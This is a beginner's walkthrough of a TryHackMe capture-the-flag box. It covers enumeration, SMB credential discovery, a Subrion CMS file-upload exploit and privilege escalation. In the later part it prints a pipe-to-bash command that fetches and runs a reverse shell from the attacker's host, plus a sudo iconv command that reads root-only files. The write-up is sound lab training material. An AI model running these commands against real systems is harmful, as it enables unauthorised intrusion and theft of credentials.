Tech_Supp0rt TryHackMe Walkthough
introduction
Hello guys back again with another walkthrough this time we are going to be tackling Tech_Supp0rt: 1 from TryHackMe.The box tells a story of how a scammers server got hacked due to some unpatched vulnerabilities. It’s a really amazing easy box good for beginners and it teaches the importance of enumeration. You start off by finding a web server which the root page is just the default apache web page and by performing some directory brute forcing you get some endpoint running websites like WordPress and some odd scammers webpage. But you don’t have access to the WordPress and it turns out to be a dead end but looking at the nmap scan performed initially you discover that SMB is listening on port 445 and the scammers left a note that contains an endpoint to a CMS called subrion and some encoded credentials. On visiting the endpoint and looking at the responses returned by the backend server we can see that the server has a redirect loop but through the notes we get from the SMB share we find a way to bypass it then use CyberChef to decode the encoded credentials and login to the CMS as an admin users then using an insecure file upload vulnerability gain a shell on the system. After which we will escalate our privileges to the second user from credentials from wp-config.php and use iconv to get the root flag from the system. It was a fun box and without much say let’s jump in
As always we start of with a nmap scan of the box to find the ports that are open and looking at the screenshot below we have 3 ports open namely
- SSH (Secure shell)
- HTTP (web server)
- Netbios-ssn (port 139)
- SMB (Samba share)
SSH version seems to be secure though the OS running is Ubuntu Bionic meaning we cannot exploit SSH and we do not have credentials to log in to the system via SSH. This means that we’ll probably have to enumerate the service last. I started by enumerating HTTP. Opening the website i found out it was the default ubuntu web page
Looking at the source code by pressing ctrl + u I did not find any hidden content on the root page. I decided to run gobuster which is a tool written in go used to perform directory brute forcing. And found two endpoint
- Wordpress
- Test
WordPress seemed more interesting and i visited the endpoint using a web browser. Looking at the screenshot below we get a standard WordPress site
I ran wpscan against the WordPress to see if I could get some quick wins like core vulnerabilities that WordPress might have but all vulnerabilities identified seem a bit far fetched for an easy box.
While the enumeration was still running I decided to look at the test endpoint and see if i could find anything interesting but I found a typical scamming page
It was an entirely static site with nothing important to enumerate. I had hit another dead end. I decided to go back to the nmap results and there was an SMB port listening. If by any chance it accepts null authentication we might get some sensitive files from the share. To test for null authentication i used crackmapexec. Crackmapexec is a swiss army knife for pentesting Windows/Active Directory environments. it is used for enumerating logged on users and spidering SMB shares to executing psexec style attacks, auto-injecting Mimikatz/Shellcode/DLL’s into memory using Powershell, dumping the NTDS.dit. Looking at the screenshot below we find out that there’s a share called websrv
I used smbclient to log in to SMB and there was a file called enter.txt i downloaded the file to my box.
Closed the SMB share. Since port 139 was open I decided to run enum4linux. Someone might get lucky and be able to dump the list of users who are onboarded on the server.
While enum4linux was running in the background i decided to look at the file I had downloaded from the SMB share and looking at the screenshot below we have a newly discovered endpoint and the credential for the admin user
On trying to access /subrion endpoint we get a failed to connect error from the web server. I decided to intercept the request using burpsuite to see exactly what the actual problem was. Looking at the screenshot from burpsuite we see that the endpoint URL is invalid
And this cause the failed to connect error message that we receive from burpsuite.
If I tried to access the index.php file I got infinite redirects even if I changed the server IP address in burpsuite response but when i access a file that I know exists I get a 200 OK
You might be asking how did i know that robots.txt existed on the server and a little GitHub searching would do the trick
Looking at the disallowed entries in robots.txt we see /panel also going back to the enter.txt file left on the SMB server we see that there was a comment of edit from panel. I tried to access /subrion/panel/ and to my surprise it worked i got a login page.
Also we know the exact version of the CMS is version 4.2.1 this is seen from the login page
Remember we had some credentials on the enter.txt from the SMB share. I tried to use those credentials as they were but i got an authentication error on the CMS
My first thought was that maybe the password was encoded. I used CyberChef and the magic function to try and decrypt it. Looking at the screenshot below when we use base58 to try and decode the password we get a success
I tried to use the username admin with the decoded password to log in to the CMS and see if i could get access to the admin page and funny enough it worked
Next i decided to go to searchsploit and see if I could find a CVE for this specific version of subrion CMS and I found it had an authenticated insecure file upload vulnerability that leads to remote code execution
I mirrored the exploit back to my current working directory and ran it using the decrypted credentials and I got remote code execution on the web server
Next step was to get a shell on the box. I wrote a simple bash reverse shell and hosted it on my box using a python web server
Next i downloaded the script to the scammers machine and executed it though bash using the command
curl 10.8.2.58:8000/shell.sh | bash
Looking at the screenshot below i had a shell on the box
Next i upgraded my shell and decided to look around trying to find a way of escalating my privileges
I remembered there was a WordPress site and it contains a wp-config file. I hunted it down and got the password
And the server has only two users namely
- root
- scamsite
Looking back through enum4linux it was able to identify scamsite as a local user
Next i tried to use the wp-config.php credentials as the password for scamsite and to my surprise it worked!!!
Next we have to escalate our privileges to the root user. Running sudo -l we see that we can run iconv as any user on the server without knowing their password.
Using GTFOBins we find a way to read files
First i tried reading root flag using the command below
sudo -u root iconv -f 8859_1 -t 8859_1 "/root/root.txt"
And looking at the screenshot below it worked
I decided to check .ssh directory to see of any private key was left behind and i found the root’s user SSH private key
I didn’t try to log in since i had already gotten the root flag and the box is done. Hope you enjoyed the walkthrough if so clap for me down below and follow me so that you won’t miss any upcoming walkthroughs